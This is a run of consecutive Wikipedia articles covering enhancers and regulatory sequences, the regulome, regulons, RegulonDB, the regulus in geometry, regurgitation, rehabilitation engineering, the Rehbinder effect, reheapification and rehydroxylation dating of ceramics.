Enhancers are sequences of the genome that are major gene-regulatory elements. Enhancers control cell-type-specific gene expression programs, most often by looping through long distances to come in physical proximity with the promoters of their target genes. [ 6 ] In a study of brain cortical neurons, 24,937 loops were found, bringing enhancers to promoters. [ 3 ] Multiple enhancers, each often at tens or hundreds of thousands of nucleotides distant from their target genes, loop to their target gene promoters and coordinate with each other to control expression of their common target gene. [ 6 ]
The schematic illustration in this section shows an enhancer looping around to come into close physical proximity with the promoter of a target gene. The loop is stabilized by a dimer of a connector protein (e.g. dimer of CTCF or YY1 ), with one member of the dimer anchored to its binding motif on the enhancer and the other member anchored to its binding motif on the promoter (represented by the red zigzags in the illustration). [ 7 ] Several cell function specific transcription factor proteins (in 2018 Lambert et al. indicated there were about 1,600 transcription factors in a human cell [ 8 ] ) generally bind to specific motifs on an enhancer [ 9 ] and a small combination of these enhancer-bound transcription factors, when brought close to a promoter by a DNA loop, govern the level of transcription of the target gene. Mediator (coactivator) (a complex usually consisting of about 26 proteins in an interacting structure) communicates regulatory signals from enhancer DNA-bound transcription factors directly to the RNA polymerase II (RNAP II) enzyme bound to the promoter. [ 10 ]
Enhancers, when active, are generally transcribed from both strands of DNA with RNA polymerases acting in two different directions, producing two eRNAs as illustrated in the Figure. [ 11 ] An inactive enhancer may be bound by an inactive transcription factor. Phosphorylation of the transcription factor may activate it and that activated transcription factor may then activate the enhancer to which it is bound (see small red star representing phosphorylation of a transcription factor bound to an enhancer in the illustration). [ 12 ] An activated enhancer begins transcription of its RNA before activating a promoter to initiate transcription of messenger RNA from its target gene. [ 13 ]
Transcription factor binding sites within enhancers (see figure above) are usually about 10 base pairs long, though they can vary from just a few to about 20 base pairs. [ 14 ] Enhancers usually have about 10 transcription factor binding sites within an average enhancer site of about 204 base pairs. [ 15 ] Examining enhancer-gene regulatory interactions occurring in 352 cell types and tissues, more than 13 million active enhancers were found. [ 16 ]
While enhancers are needed for transcription of genes in a cell above low levels, a cluster of enhancers, known as a super-enhancer, can cause transcription of a target gene at even higher levels. Super-enhancers usually drive genes needed for cell identity to express at high levels. [ 17 ] [ 18 ] In cancers, a super-enhancer may also drive a particular oncogene to express at a high level. [ 17 ] [ 18 ]
A super-enhancer is defined as a cluster of typical enhancers in close genomic proximity (within about 9,000 [ 17 ] to 22,000 [ 19 ] base pairs) that, all together, regulate the expression of a target gene. [ 20 ] Super-enhancer-driven genes are expressed at significantly higher levels than genes under the control of typical enhancers. [ 20 ]
A diagram of a super-enhancer is shown in the Figure in this section. In this Figure, the super-enhancer is 12,000 nucleotides long and has four typical enhancers within its length. Each of the typical enhancers simultaneously contacts the promoter region of the same target gene. Each typical enhancer within the super-enhancer has multiple DNA motifs to which transcription factors bind. Each typical enhancer is also bound to a 26-component mediator complex which transmits the signals from the transcription factors bound to the enhancer to the promoter of their joint target gene. The protein BRD4 forms a complex with each typical enhancer in the super-enhancer and helps to stabilize the super-enhancer structure. [ 21 ] In addition, the architectural protein YY1 (indicated by paired red zigzags) helps keep the loops together that bring the typical enhancers to their target gene in the super-enhancer. [ 7 ] Therefore, there are many proteins in close association at a super-enhancer. These proteins generally have a structured domain as well as a tail with an intrinsically disordered region (IDR). [ 22 ] Many of the IDRs of these proteins interact with each other, thereby forming a water-excluding gel or phase-separated condensate around the super-enhancer. [ 22 ]
Some super-enhancers induce very high levels of transcription, such as the mouse α-globin super-enhancer [ 23 ] and the Wap super-enhancer. [ 24 ] The mouse α-globin super-enhancer has five typical enhancers within the super-enhancer. Only when acting together do they increase transcription of the α-globin gene by 450-fold. [ 23 ] In another example, the mouse Wap super-enhancer includes three typical enhancers. Only when the three typical enhancers act together do they increase transcription of the Wap gene by 1000-fold. [ 24 ]
The enhancers within the super-enhancers described above act synergistically. However, in a second type of super-enhancer, the component enhancers act additively. In a third group, super-enhancers appear to act “logistically”, where promoter activity reaches a limit. One study examined 773 target genes that were paired with nearby groups of possible super-enhancers (with 2–20 enhancers in close proximity likely acting as super-enhancers). In this study, 277, 92, and 250 of the likely super-enhancers appeared to act according to the additive, synergistic, and logistic models, respectively. [ 25 ]
Super-enhancers may occupy regions of the genome about 10,000 to 60,000 nucleotides long, [ 26 ] while typical enhancers are each about 204 base pairs long. [ 15 ] When 8 types of cells were evaluated, super-enhancers constituted between 2.5% and 10.9% of the enhancers driving transcription, while typical enhancers were the majority of enhancers driving transcription. There were between 257 and 1,099 super-enhancers in these eight cell types and between 5,512 and 23,869 typical enhancers. [ 27 ]
While super-enhancers are active at only about 2.5% to 10.9% of actively transcribed sites in a cell, they recruit transcription machinery more actively than typical single enhancers do. The super-enhancers in a cell utilize about 12% to 36% of the RNA polymerases, mediator proteins, BRD4 proteins, and other transcription machinery of the cell. [ 17 ]
5-Methylcytosine (5-mC) is a methylated form of the DNA base cytosine (see figure). 5-mC is an epigenetic marker found predominantly on cytosines within CpG dinucleotides, which consist of a cytosine followed by a guanine, reading in the 5' to 3' direction along the DNA strand ( CpG sites ). About 28 million CpG dinucleotides occur in the human genome. [ 28 ] In most tissues of mammals, on average, 70% to 80% of CpG cytosines are methylated (forming 5-methyl-CpG, or 5-mCpG). [ 29 ] Methylated cytosines within CpG sequences often occur in groups, called CpG islands . About 59% of promoter sequences have a CpG island while only about 6% of enhancer sequences have a CpG island. [ 30 ] CpG islands constitute regulatory sequences, since if CpG islands are methylated in the promoter of a gene this can reduce or silence gene expression. [ 31 ]
DNA methylation regulates gene expression through interaction with methyl binding domain (MBD) proteins, such as MeCP2, MBD1 and MBD2. These MBD proteins bind most strongly to highly methylated CpG islands . [ 32 ] These MBD proteins have both a methyl-CpG-binding domain and a transcriptional repression domain. [ 32 ] They bind to methylated DNA and guide or direct protein complexes with chromatin remodeling and/or histone modifying activity to methylated CpG islands. MBD proteins generally repress local chromatin by means such as catalyzing the introduction of repressive histone marks or creating an overall repressive chromatin environment through nucleosome remodeling and chromatin reorganization. [ 32 ]
Transcription factors are proteins that bind to specific DNA sequences in order to regulate the expression of a given gene. The binding sequence for a transcription factor in DNA is usually about 10 or 11 nucleotides long. There are approximately 1,400 different transcription factors encoded in the human genome, and they constitute about 6% of all human protein coding genes. [ 33 ] About 94% of transcription factor binding sites that are associated with signal-responsive genes occur in enhancers while only about 6% of such sites occur in promoters. [ 9 ]
EGR1 is a transcription factor important for regulation of methylation of CpG islands. An EGR1 transcription factor binding site is frequently located in enhancer or promoter sequences. [ 34 ] There are about 12,000 binding sites for EGR1 in the mammalian genome and about half of EGR1 binding sites are located in promoters and half in enhancers. [ 34 ] The binding of EGR1 to its target DNA binding site is insensitive to cytosine methylation in the DNA. [ 34 ]
While only small amounts of EGR1 protein are detectable in cells that are un-stimulated, EGR1 translation into protein at one hour after stimulation is markedly elevated. [ 35 ] Expression of EGR1 in various types of cells can be stimulated by growth factors, neurotransmitters, hormones, stress and injury. [ 35 ] In the brain, when neurons are activated, EGR1 proteins are upregulated, and they bind to (recruit) pre-existing TET1 enzymes, which are highly expressed in neurons. TET enzymes can catalyze demethylation of 5-methylcytosine. When EGR1 transcription factors bring TET1 enzymes to EGR1 binding sites in promoters, the TET enzymes can demethylate the methylated CpG islands at those promoters. Upon demethylation, these promoters can then initiate transcription of their target genes. Hundreds of genes in neurons are differentially expressed after neuron activation through EGR1 recruitment of TET1 to methylated regulatory sequences in their promoters. [ 34 ]
About 600 regulatory sequences in promoters and about 800 regulatory sequences in enhancers appear to depend on double-strand breaks initiated by topoisomerase 2β (TOP2B) for activation. [ 36 ] [ 37 ] The induction of particular double-strand breaks is specific with respect to the inducing signal. When neurons are activated in vitro , just 22 TOP2B-induced double-strand breaks occur in their genomes. [ 38 ] However, when contextual fear conditioning is carried out in a mouse, this conditioning causes hundreds of gene-associated DSBs in the medial prefrontal cortex and hippocampus, which are important for learning and memory. [ 39 ]
Such TOP2B-induced double-strand breaks are accompanied by at least four enzymes of the non-homologous end joining (NHEJ) DNA repair pathway (DNA-PKcs, KU70, KU80 and DNA LIGASE IV) (see figure). These enzymes repair the double-strand breaks within about 15 minutes to 2 hours. [ 38 ] [ 40 ] The double-strand breaks in the promoter are thus associated with TOP2B and at least these four repair enzymes. These proteins are present simultaneously on a single promoter nucleosome (there are about 147 nucleotides in the DNA sequence wrapped around a single nucleosome) located near the transcription start site of their target gene. [ 40 ]
The double-strand break introduced by TOP2B apparently frees the part of the promoter at an RNA polymerase–bound transcription start site to physically move to its associated enhancer. This allows the enhancer, with its bound transcription factors and mediator proteins, to directly interact with the RNA polymerase that had been paused at the transcription start site to start transcription. [ 38 ] [ 10 ]
Similarly, topoisomerase I (TOP1) enzymes appear to be located at many enhancers, and those enhancers become activated when TOP1 introduces a single-strand break. [ 41 ] TOP1 causes single-strand breaks in particular enhancer DNA regulatory sequences when signaled by a specific enhancer-binding transcription factor. [ 41 ] Topoisomerase I breaks are associated with different DNA repair factors than those surrounding TOP2B breaks. In the case of TOP1, the breaks are associated most immediately with DNA repair enzymes MRE11 , RAD50 and ATR . [ 41 ]
Genomes can be analyzed systematically to identify regulatory regions. [ 42 ] Conserved non-coding sequences often contain regulatory regions, and so they are often the subject of these analyses.
Regulatory sequences for the insulin gene are: [ 43 ] | https://en.wikipedia.org/wiki/Regulatory_sequence |
Regulome refers to the whole set of regulatory components in a cell . [ 1 ] Those components can be regulatory elements, genes , mRNAs , proteins , and metabolites . The description includes the interplay of regulatory effects between these components, and their dependence on variables such as subcellular localization , tissue , developmental stage, and pathological state.
Among the major players in cellular regulation are transcription factors , proteins that regulate the expression of genes. [ 2 ] Other proteins that bind to transcription factors to form transcriptional complexes may modify the activity of transcription factors, for example by blocking their capacity to bind to a promoter .
Signaling pathways are chains of proteins that transmit a signal from one part of the cell to another, for example linking the presence of a substance at the exterior of the cell to the activation of the expression of a gene.
High-throughput technologies for the analysis of biological samples (for example, DNA microarrays , proteomics analysis) allow the measurement of thousands of biological components such as mRNAs, proteins, or metabolites. [ 3 ] Chromatin immunoprecipitation of transcription factors can be used to map transcription factor binding sites in the genome. [ 4 ]
Such techniques allow researchers to study the effects of particular substances and/or situations on a cellular sample at a genomic level (for example, by addition of a drug, or by placing cells in a situation of stress). The information obtained allows parts of the regulome to be inferred.
One of the objectives of systems biology is the modeling of biological processes using mathematics and computer simulation . [ 5 ] The data produced by techniques of genomic analysis are not always easy to interpret, mainly due to their complexity and the large number of data points. Modeling can handle the data and allows a hypothesis (for example, that gene A is regulated by protein B) to be tested and then verified experimentally.
Complete knowledge of the regulome would allow researchers to model cell behaviour entirely. This would facilitate the design of drugs for therapy, [ 6 ] the control of stem cell differentiation, and the prognosis of disease . | https://en.wikipedia.org/wiki/Regulome |
In molecular genetics , a regulon is a group of genes that are regulated as a unit, generally controlled by the same regulatory gene that expresses a protein acting as a repressor or activator . This terminology is generally, although not exclusively, used in reference to prokaryotes , whose genomes are often organized into operons ; the genes contained within a regulon are usually organized into more than one operon at disparate locations on the chromosome . [ 1 ] Applied to eukaryotes , the term refers to any group of non-contiguous genes controlled by the same regulatory gene. [ 2 ]
A modulon is a set of regulons or operons that are collectively regulated in response to changes in overall conditions or stresses, but may be under the control of different or overlapping regulatory molecules. The term stimulon is sometimes used to refer to the set of genes whose expression responds to specific environmental stimuli. [ 1 ]
Commonly studied regulons in bacteria are those involved in response to stress such as heat shock . The heat shock response in E. coli is regulated by the sigma factor σ32 ( RpoH ), whose regulon has been characterized as containing at least 89 open reading frames . [ 3 ]
Regulons involving virulence factors in pathogenic bacteria are of particular research interest; an often-studied example is the phosphate regulon in E. coli , which couples phosphate homeostasis to pathogenicity through a two-component system . [ 4 ] Regulons can sometimes be pathogenicity islands . [ 5 ]
The Ada regulon in E. coli is a well-characterized example of a group of genes involved in the adaptive response form of DNA repair . [ 6 ]
Quorum sensing behavior in bacteria is a commonly cited example of a modulon or stimulon, [ 7 ] though some sources describe this type of intercellular auto-induction as a separate form of regulation. [ 1 ]
Changes in the regulation of gene networks are a common mechanism for prokaryotic evolution . An example of the effects of different regulatory environments for homologous proteins is the DNA-binding protein OmpR , which is involved in response to osmotic stress in E. coli but is involved in response to acidic environments in the close relative Salmonella Typhimurium . [ 8 ] | https://en.wikipedia.org/wiki/Regulon |
RegulonDB is a database of the regulatory network of gene expression in Escherichia coli K-12 . [ 1 ] [ 2 ] RegulonDB also models the organization of the genes in transcription units, operons and regulons . A total of 120 sRNAs with 231 interactions, which altogether regulate 192 genes, are also included. RegulonDB was founded in 1998 and also contributes data to the EcoCyc database.
In bacteria , such as E. coli , genes are regulated by sequence elements in promoters and related binding sites. RegulonDB provides a database of such regulatory elements, their binding sites and the transcription factors that bind to these sites in E. coli . RegulonDB 9.0 includes 184 experimentally determined transcription factors (TFs) as well as 120 computationally predicted TFs, that is, a total of 304.
The complete repertoire of 189 genetic sensory-response units (GENSOR units) is reported, integrating their signal, regulatory interactions, and metabolic pathways. A total of 78 GENSOR units have all four components highlighted; 119 include the genetic switch and the response, and 2 contain only the genetic switch.
A total of 103 TFs have a known effector in RegulonDB, including 25 two-component systems . There were enough sites to build motifs for 93 TFs, from which 16,207 TF binding sites were predicted. This set of predicted binding sites corresponds to 12,574 TF → gene regulatory interactions; this represents a recovery of 52% of the 1,592 annotated regulatory interactions in the database for the 93 TFs for which RegulonDB has a position-weight matrix (PWM). If only TFs with a good-quality PWM are taken into account, the total number of predicted TF → gene interactions is 8,714, recovering 672 (57%) of annotated interactions for this TF subset. Semi-automatic curation produced a total of 3,195 regulatory interactions for 199 TFs.
A transcription unit is a set of one or more genes transcribed from a single promoter. A TU may also include regulatory protein binding sites affecting this promoter and a terminator. A complex operon with several promoters contains, therefore, several transcription units. A transcription unit must include all the genes in an operon.
A promoter is defined in RegulonDB as the nucleotide sequence 60 bases upstream and 20 downstream from the precise initiation of transcription or +1. Terminators are regions where transcription ends, and RNA Polymerase unbinds from DNA .
TF binding sites are physical DNA sites recognized by transcription factors within a genome, including enhancer , upstream activator (UAS) and operator sites that may bind repressors or activators .
The graphic display of an operon contains all the genes of its different transcription units, as well as all the regulatory elements involved in the transcription and regulation of those TUs. An operon is here conceived as a structural unit encompassing all genes and regulatory elements. An operon with several promoters located near each other may also have dual binding sites, indicating that such a site can activate one particular promoter, but repress a second one.
On the same page, the collection of the different TUs is displayed below the operon.
The graphic display of a TU will always contain only one promoter (when known), with the binding sites that regulate its activity, followed by the transcribed genes. Note that dual sites are frequently displayed at a TU as repressors or activators. This is because the site will have a particular effect on the promoter of that TU. | https://en.wikipedia.org/wiki/RegulonDB |
In three-dimensional space, a regulus R is a set of skew lines , every point of which is on a transversal which intersects an element of R only once, and such that every point on a transversal lies on a line of R .
The set of transversals of R forms an opposite regulus S . In $\mathbb{R}^3$ the union R ∪ S is the ruled surface of a hyperboloid of one sheet .
Three skew lines determine a regulus:
According to Charlotte Scott , "The regulus supplies extremely simple proofs of the properties of a conic...the theorems of Chasles, Brianchon , and Pascal ..." [ 2 ]
In a finite geometry PG(3, q ), a regulus has q + 1 lines. [ 3 ] For example, in 1954 William Edge described a pair of reguli of four lines each in PG(3,3). [ 4 ]
Robert J. T. Bell described how the regulus is generated by a moving straight line. First, the hyperboloid $\frac{x^{2}}{a^{2}}+\frac{y^{2}}{b^{2}}-\frac{z^{2}}{c^{2}}=1$ is factored as $\left(\frac{x}{a}+\frac{z}{c}\right)\left(\frac{x}{a}-\frac{z}{c}\right)=\left(1+\frac{y}{b}\right)\left(1-\frac{y}{b}\right).$
Then two systems of lines, parametrized by λ and μ, satisfy this equation: $\frac{x}{a}+\frac{z}{c}=\lambda\left(1+\frac{y}{b}\right),\quad \lambda\left(\frac{x}{a}-\frac{z}{c}\right)=1-\frac{y}{b}$ and $\frac{x}{a}+\frac{z}{c}=\mu\left(1-\frac{y}{b}\right),\quad \mu\left(\frac{x}{a}-\frac{z}{c}\right)=1+\frac{y}{b}.$
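As a quick illustration, the following sketch (using Python with SymPy; the variable names and the check itself are ours, not Bell's) verifies symbolically that every point of a line from the λ-system lies on the hyperboloid:

```python
# Symbolic check that the lambda-system lines lie on the hyperboloid
# x^2/a^2 + y^2/b^2 - z^2/c^2 = 1. A point on one line is parametrized by
# y = s; x and z are recovered from the two plane equations of the system.
import sympy as sp

a, b, c, lam, s = sp.symbols('a b c lam s', nonzero=True)

u = lam * (1 + s / b)    # u = x/a + z/c, first equation of the lambda-system
v = (1 - s / b) / lam    # v = x/a - z/c, second equation of the lambda-system
x = a * (u + v) / 2
z = c * (u - v) / 2

expr = x**2 / a**2 + s**2 / b**2 - z**2 / c**2
print(sp.simplify(expr))  # prints 1: the whole line lies on the surface
```

The μ-system can be checked the same way by swapping the roles of (1 + y/b) and (1 − y/b).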
No member of the first set of lines is a member of the second. As λ or μ varies, the hyperboloid is generated. The two sets represent a regulus and its opposite. Using analytic geometry , Bell proves that no two generators in a set intersect, and that any two generators in opposite reguli do intersect and form the plane tangent to the hyperboloid at that point. (page 155). [ 5 ] | https://en.wikipedia.org/wiki/Regulus_(geometry) |
Regurgitation is the expulsion of material from the pharynx , or esophagus , usually characterized by the presence of undigested food or blood. [ 1 ]
Regurgitation is used by a number of species to feed their young. [ 2 ] This is typically in circumstances where the young are at a fixed location and a parent must forage or hunt for food, especially under circumstances where the carriage of small prey would be subject to robbing by other predators or the whole prey is larger than can be carried to a den or nest. Some bird species also occasionally regurgitate pellets of indigestible matter such as bones and feathers. [ 3 ]
In most animals it is a normal and voluntary process, unlike the complex vomiting reflex that occurs in response to toxins.
In humans it can be voluntary or involuntary, the latter being due to a small number of disorders. Regurgitation of a person's meals following ingestion is known as rumination syndrome , an uncommon and often misdiagnosed motility disorder that affects eating. It may be a symptom of gastroesophageal reflux disease (GERD). [ 4 ]
In infants, regurgitation – or spitting up – is quite common, with 67% of 4-month-old infants spitting up more than once per day. [ 5 ]
Some people are able to regurgitate without using any external stimulation or drug, by means of muscle control. Practitioners of yoga have also been known to do this. [ 6 ] Professional regurgitators perfect the ability to such a degree as to be able to exploit it as entertainment. [ 7 ] [ 8 ]
For birds that transport food to their mates and/or their young over long distances — especially seabirds — it is impractical to carry food in their bills because of the risk that it would be stolen by other birds, such as frigatebirds , skuas and gulls . Such birds often employ a regurgitative feeding strategy. Many species of gulls have an orange to red spot near the end of the bill (called a "subterminal spot") that the chicks peck in order to stimulate regurgitation.
All of the Suliformes employ a regurgitative strategy to feed their young. In some species, such as the blue-footed booby , masked booby , and Nazca booby , a brood hierarchy exists, in which the older chick is fed before the younger, subordinate chick. In times when food is scarce, siblicide may occur, where the dominant chick kills its younger sibling in order to sequester all of the resources of the parents. [ 9 ] Penguin chicks are fed regurgitated food by both parents. [ 10 ] [ 11 ] Researchers found that the practice may potentially cause metabolic alkalosis in certain penguins. [ 12 ]
Some birds, such as fulmars , employ regurgitation as a defense when threatened.
Ruminants regurgitate their food as a normal part of digestion. During their idle time, they chew the regurgitated food ( cud ) and swallow it again, which increases digestibility by reducing particle size. [ citation needed ]
Honey bees produce honey by a process of regurgitation; it is stored in the beehive as a primary food source. | https://en.wikipedia.org/wiki/Regurgitation_(digestion) |
Rehabilitation engineering is the systematic application of engineering sciences to design, develop, adapt, test, evaluate, apply, and distribute technological solutions to problems confronted by individuals with disabilities. These individuals may have experienced a spinal cord injury, brain trauma, or any other debilitating injury or disease (such as multiple sclerosis, Parkinson's, West Nile, ALS , etc.). Functional areas addressed through rehabilitation engineering may include mobility, communications, hearing, vision, and cognition, and activities associated with employment, independent living, education, and integration into the community. [ 1 ]
Rehabilitation Engineering and Assistive Technology Society of North America , the association and certifying organization of professionals within the field of Rehabilitation Engineering and Assistive Technology in North America, defines the role of a Rehabilitation Engineer, as well as the roles of a Rehabilitation Technician, Assistive Technologist, and Rehabilitation Technologist (not all the same), in a White Paper approved in 2017 and available on its website. [ 2 ] [ 3 ]
While some rehabilitation engineers have master's degrees in rehabilitation engineering, usually a subspecialty of Biomedical engineering , most rehabilitation engineers have undergraduate or graduate degrees in biomedical engineering , mechanical engineering , or electrical engineering . A Portuguese university provides an undergraduate degree and a master's degree in Rehabilitation Engineering and Accessibility. [ 4 ] [ 5 ]
In the UK, there are 3 recognised training routes into Rehabilitation Engineering:
In the UK, there are 3 professional registration bodies for Rehabilitation Engineers:
Many of the Rehabilitation Engineering professionals join multidisciplinary scientific and technical associations with a common interest in the field of Assistive Technology and Accessibility. Examples are RESNA - Rehabilitation Engineering and Assistive Technology Society of North America , RESJA - Rehabilitation Engineering Society of JAPAN , AAATE - Association for the Advancement of Assistive Technology in Europe , ARATA – Australian Rehabilitation & Assistive Technology Association , AITADIS - Asociación Iberoamericana de Tecnologías de Apoyo a la Discapacidad and SUPERA – Portuguese Society of Rehabilitation Engineering, Assistive Technologies and Accessibility .
Other organizations, like RESMAG and the National Committee on Rehabilitation Engineering of Engineers Australia are also committed to developing and providing resources that support the practice of rehabilitation engineers.
The Rehabilitation Engineering and Assistive Technology Society of North America (RESNA), whose mission is to "improve the potential of people with disabilities to achieve their goals through the use of technology", is one of the main professional societies for rehabilitation engineers. [ 7 ] RESNA's annual conference is held in the Washington, D.C., area in July.
UK Professional Bodies for Clinical Scientists in Rehabilitation Engineering:
The rehabilitation process for people with disabilities often entails mechanical design of assistive devices such as Walking aids intended to promote inclusion of their users into the mainstream of society, commerce, and recreation. Device development can range from purely mechanical to mechatronics and software.
Within the National Health Service of the United Kingdom Rehabilitation Engineers are commonly involved with assessment and provision of wheelchairs and seating to promote good posture and independent mobility. This includes electrically powered wheelchairs, active user (lightweight) manual wheelchairs, and in more advanced clinics this may include assessments for specialist wheelchair control systems and/or bespoke seating solutions.
The A-SET Mind Controlled Wheelchair was invented by Diwakar Vaish , the head of Robotics and Research at A-SET Training and Research Institutes, India. It is of great importance to patients with locked-in syndrome , as it uses neural signals to command the wheelchair. This is the world's first neurally controlled wheelchair in production.
Many of these devices are not designed to be multi-functional or to be easy to use. [ 8 ]
Rehabilitation Engineering Research Centers conduct research in the rehabilitation engineering, each focusing on one general area or aspect of disability. [ 9 ] For example, the Smith-Kettlewell Eye Research Institute conducts research for the blind and visually impaired . [ 10 ] Many of the Veterans Administration Rehabilitation Research & Development Centers conduct rehabilitation engineering research. [ 11 ] | https://en.wikipedia.org/wiki/Rehabilitation_engineering |
In physics , the Rehbinder effect is the reduction in the hardness and ductility of a material, particularly metals, by a surfactant film. [ 1 ] The effect is named for Soviet scientist Piotr Aleksandrovich Rehbinder [ ru ] , [ 2 ] [ 3 ] who first described the effect in 1928. [ 4 ]
A proposed explanation for this effect is the disruption of surface oxide films, and the reduction of surface energy by surfactants. [ 1 ] [ 5 ]
The effect is of particular importance in machining , as lubricants reduce cutting forces. [ 5 ] [ 6 ]
| https://en.wikipedia.org/wiki/Rehbinder_effect |
Reheapification is a term promoted by some C++ textbooks [ 1 ] to describe the process of fixing a binary heap data structure after a node is either removed or added. Other authors [ 2 ] describe the process as bubbling up or bubbling down.
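To make the operation concrete, here is a minimal Python sketch of reheapification by bubble-down after removing the root of an array-backed binary min-heap; the function names are illustrative, not taken from the cited textbooks:

```python
def bubble_down(heap, i):
    """Restore the min-heap property below index i by repeated swaps."""
    n = len(heap)
    while True:
        left, right, smallest = 2 * i + 1, 2 * i + 2, i
        if left < n and heap[left] < heap[smallest]:
            smallest = left
        if right < n and heap[right] < heap[smallest]:
            smallest = right
        if smallest == i:          # heap order restored
            return
        heap[i], heap[smallest] = heap[smallest], heap[i]
        i = smallest

def pop_min(heap):
    """Remove and return the smallest element, then reheapify."""
    top = heap[0]
    heap[0] = heap[-1]             # move the last element to the root
    heap.pop()
    if heap:
        bubble_down(heap, 0)       # the reheapification step
    return top

h = [1, 3, 2, 7, 4, 5]             # a valid min-heap
print(pop_min(h), h)               # 1 [2, 3, 5, 7, 4]
```

Bubble-up after insertion is symmetric: the new element is appended at the end of the array and swapped with its parent until the heap order holds.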
| https://en.wikipedia.org/wiki/Reheapification |
Rehydroxylation [RHX] dating is a developing method for dating fired-clay ceramics . [ 1 ] This new concept relies on a key property of ceramic materials, in which they expand and gain mass over time. After a ceramic specimen is removed from the kiln at the time of production, it immediately begins to recombine chemically with moisture from the environment. This reaction reincorporates hydroxyl (OH) groups into the ceramic material, and is described as rehydroxylation (RHX). [ 2 ] The phenomenon has been well-documented over the past one hundred years (albeit more focused on limited timescales), and has now been proposed as a means to date fired-clay ceramics. The RHX process produces an increase in specimen weight and this weight increase provides an accurate measure of the extent of rehydroxylation. The dating clock is provided by the experimental finding that the RHX reaction follows a precise kinetic law: the weight gain increases as the fourth root of the time which has elapsed since firing. [ 3 ] This power law and the RHX method which follows from it were discovered by scientists from the University of Manchester and the University of Edinburgh . [ 4 ]
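A quick numeric check of this fourth-root law, reproducing the figures quoted above (the 0.1%-per-year rate is illustrative):

```python
# Fractional weight gain y = alpha * t**(1/4); alpha is chosen so that
# y = 0.1% at t = 1 year, matching the example in the text.
alpha = 0.1  # percent per year^(1/4), illustrative
for years in (1, 16, 81, 256):
    print(f"{years:>3} years: {alpha * years ** 0.25:.1f}% gain")
# 1 -> 0.1%, 16 -> 0.2%, 81 -> 0.3%, 256 -> 0.4%
```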
The concept of RHX dating was first stated in 2003 by Wilson and collaborators [ 3 ] who noted that the "results … suggest a new method for archaeological dating of ceramics". The RHX method was then described in detail in 2009 [ 1 ] for brick and tile materials, and in relation to pottery in 2011. [ 5 ] The archaeological pottery first used to test the developing RHX method consisted of three categories whose dates had already been established by other archaeological means: an Anglo-Saxon loom-weight from 560 to 660 AD, a Samian-ware sherd from 45 to 75 AD and three Werra earthenware sherds from 1605 AD. [ 5 ] These samples were deemed important for the experiment since they represented "three specific perceived issues associated with applying the RHX method to excavate archaeological pottery." [ 5 ] These issues included potsherds found in waterlogged sites, low-firing-temperature ceramics, vitrified ceramics and those containing a slip or a glaze .
RHX dating is not yet routinely or commercially available. It is the subject of a number of research and validation studies in several countries.
The concept of clay ceramic expansion, post-firing, has been the object of discussion for a long time, first noted by Schurecht in 1928 [ 6 ] to explain crazing in ceramic glazes, and confirmed in 1954 by McBurney, who showed that this and the expansion of ceramic bodies are due to the intake of moisture from the environment. [ 7 ] Moisture expansion has since been an important property of clay ceramics to consider when using the material, such as clay bricks in constructions. In 2003, it was proposed that moisture expansion could extend over much longer periods of time, contrasting with the previous research over more limited time scales. [ 3 ] This was evaluated on bricks ranging from the Roman period to modern ones. It was ascertained that moisture expansion follows a power law : mass gain and expansion depend on $t^{1/4}$ across archaeological timescales. The reason behind this quartic-root dependence is uncertain; further research, including NMR and IR spectroscopy , is being conducted to explain it. [ 8 ] Despite the uncertainty, enough previous research and other more recent data have indicated that the law is valid, [ 9 ] [ 10 ] with moisture expansion and weight gain being proportional to each other for a specified material at any specified firing temperature.
The basis of RHX dating depends on this power law.
First a small sample of the material is obtained. To do so, the ceramic artefact is wet-cut using a water-cooled saw to avoid producing heat and consequently causing some dehydroxylation . [ 5 ] After this, any loose debris must be removed, which can be done by thoroughly cleaning the sample under running water. The sample is then heated to 105 °C until constant weight to remove all capillary water and loosely adsorbed water. Next, the sample is conditioned in a controlled environment at the estimated effective lifetime temperature (ELT) and relative humidity to obtain the RHX constant ( $\alpha$ ). [ 5 ] The ELT is generally close to (but not exactly the same as) the long-term annual mean surface air temperature. Finally, to completely remove all the water gained in the previous stage, the sample is heated to 500 °C for 4 hours until constant weight, indicating that all the water has been lost and that the sample has therefore hypothetically returned to its original historical mass after removal from the kiln. [ 1 ] [ 5 ]
After the preparation of the sample is complete, it is transferred to a microbalance chamber and exposed to water vapour at a controlled temperature (identical to the first ELT) and relative humidity to determine the kinetics of the mass gain through recombination with water. Once this process has been carried out for the desired length of time (on average one to two days), the mass data are recorded. [ 1 ] [ 5 ]
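As a minimal sketch of how the rate constant might be extracted from such microbalance data, assuming the mass gain is linear in $t^{1/4}$ as the power law requires (the fitting approach and the readings below are our illustration, not a published protocol):

```python
# Fit the RHX rate constant alpha as the slope of mass gain against t**(1/4).
import numpy as np

t = np.array([4.0, 8.0, 16.0, 24.0, 48.0])            # hours since reheating (synthetic)
gain = np.array([0.071, 0.085, 0.101, 0.111, 0.132])  # mass gain in mg (synthetic)

alpha, intercept = np.polyfit(t ** 0.25, gain, 1)     # least-squares line in t^(1/4)
print(f"alpha ~ {alpha:.3f} mg per hour^(1/4)")       # ~0.050 for these numbers
```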
Once the RHX rate is determined, it is possible to calculate exactly how long ago the specimen was removed from the kiln, [ 4 ] and therefore to assign a date to the material.
To determine the date of the material, the rate of the mass gain needs to be calculated using the following equation:
$y = \alpha(T)\,t^{1/4}$ [ 1 ] [ 8 ]
where $\alpha$ is the mass gain rate constant, $T$ is temperature (the ELT) and $t$ is time. The older the sample, the greater the mass gained from combining chemically with water, since the initial mass of the sample is equal to the sum of that of the original fired material and the water combined with it over its lifetime. [ 1 ] From there, using other data obtained, the age is calculated using:
$t_{\alpha} = \left[\frac{m_{\alpha}}{\alpha\,m_{4}}\right]^{4}$ [ 8 ]
where $t_{\alpha}$ is the time elapsed since the last historical firing (age of material), $m_{\alpha}$ is the mass of hydroxyl groups, $m_{4}$ is the hypothetical mass at complete dehydroxylation and $\alpha$ represents the rate constant. To ensure the date is accurate, either multiple samples from the same artefact can be taken and analysed, or the sample can be dated again using an alternative means and the results compared.
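A worked example of this age equation, with all input values hypothetical:

```python
# Age from the RHX equation t_alpha = (m_alpha / (alpha * m4))**4.
m_alpha = 0.0125   # g of chemically recombined (hydroxyl) water -- hypothetical
m4 = 5.000         # g, mass of the sample at complete dehydroxylation -- hypothetical
alpha = 5.6e-4     # fractional mass gain per year^(1/4) -- hypothetical

age_years = (m_alpha / (alpha * m4)) ** 4
print(f"time since last firing: about {age_years:.0f} years")  # ~397 years here
```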
